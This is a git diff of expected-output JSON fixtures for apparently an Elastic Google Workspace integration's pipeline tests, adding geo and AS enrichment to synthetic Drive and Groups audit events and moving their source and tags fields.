@@ -1184,8 +1340,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398369800Z", + "ingested": "2021-12-14T14:45:08.345000728Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"rename\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":true},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"bar.gif\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_value\",\"value\":\"foo.gif\",\"new_value\":\"bar.gif\"}]}}", "provider": "drive", "action": "rename", @@ -1201,21 +1378,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -1263,8 +1431,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398375400Z", + "ingested": "2021-12-14T14:45:08.345001109Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"untrash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "untrash", @@ -1280,21 +1469,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -1342,8 +1522,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398381300Z", + "ingested": "2021-12-14T14:45:08.345001623Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"sheets_import_range\",\"parameters\":[{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "sheets_import_range", @@ -1359,21 +1560,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -1421,8 +1613,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398387Z", + "ingested": "2021-12-14T14:45:08.345002014Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"trash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "trash", @@ -1438,21 +1651,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -1500,8 +1704,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398392700Z", + "ingested": "2021-12-14T14:45:08.345002421Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"remove_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "remove_lock", @@ -1517,21 +1742,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -1579,8 +1795,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398398400Z", + "ingested": "2021-12-14T14:45:08.345002804Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"upload\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "upload", @@ -1596,21 +1833,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -1659,8 +1887,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398404Z", + "ingested": "2021-12-14T14:45:08.345003193Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"view\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"shared_drive_id\",\"value\":\"1234\"}]}}", "provider": "drive", "action": "view", @@ -1676,21 +1925,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -1742,8 +1982,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398409700Z", + "ingested": "2021-12-14T14:45:08.345003582Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_editors\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", "provider": "drive", "action": "change_acl_editors", @@ -1761,21 +2022,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -1828,8 +2080,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398415Z", + "ingested": "2021-12-14T14:45:08.345003969Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_access_scope\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", "provider": "drive", "action": "change_document_access_scope", 
@@ -1847,21 +2120,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -1914,8 +2178,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398418500Z", + "ingested": "2021-12-14T14:45:08.345004467Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_visibility\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", "provider": "drive", "action": "change_document_visibility", 
@@ -1933,21 +2218,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -2000,8 +2276,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398423Z", + "ingested": "2021-12-14T14:45:08.345004874Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_membership_change\",\"parameters\":[{\"name\":\"added_role\",\"value\":\"editor\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"removed_role\",\"value\":\"content_manager\"},{\"name\":\"membership_change_type\",\"value\":\"add_to_shared_drive\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", "provider": "drive", "action": "shared_drive_membership_change", 
@@ -2019,21 +2316,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -2086,8 +2374,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398428200Z", + "ingested": "2021-12-14T14:45:08.345005260Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_settings_change\",\"parameters\":[{\"name\":\"new_settings_state\",\"value\":\"restricted\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_settings_state\",\"value\":\"unrestricted\"},{\"name\":\"shared_drive_settings_change_type\",\"value\":\"direct_acl\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", "provider": "drive", "action": "shared_drive_settings_change", 
@@ -2105,21 +2414,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -2167,8 +2467,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398433200Z", + "ingested": "2021-12-14T14:45:08.345005657Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"sheets_import_range_access_change\",\"parameters\":[{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"}]}}", "provider": "drive", "action": "sheets_import_range_access_change", 
@@ -2186,21 +2507,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", @@ -2254,8 +2566,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398437400Z", + "ingested": "2021-12-14T14:45:08.345006038Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_user_access\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"can_comment\"},{\"name\":\"old_value\",\"value\":\"can_view\"},{\"name\":\"old_visibility\",\"value\":\"people_with_link\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"target_user\",\"value\":\"user@example.com\"},{\"name\":\"visibility\",\"value\":\"private\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", "provider": "drive", "action": "change_user_access", 
@@ -2273,7 +2606,10 @@ "name": "foo", "domain": "bar.com", "id": "1" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json b/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json index 0f63c344638..00ab7129f4a 100644 --- a/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json +++ b/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -51,8 +39,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286029Z", + "ingested": "2021-12-14T14:45:12.889089404Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_permission\",\"parameters\":[{\"name\":\"acl_permission\",\"value\":\"can_add_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value_repeated\",\"multiValue\":[\"managers\",\"members\"]},{\"name\":\"old_value_repeated\",\"multiValue\":[\"managers\"]}]}}", "provider": "groups", "action": "change_acl_permission", @@ -76,24 +85,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
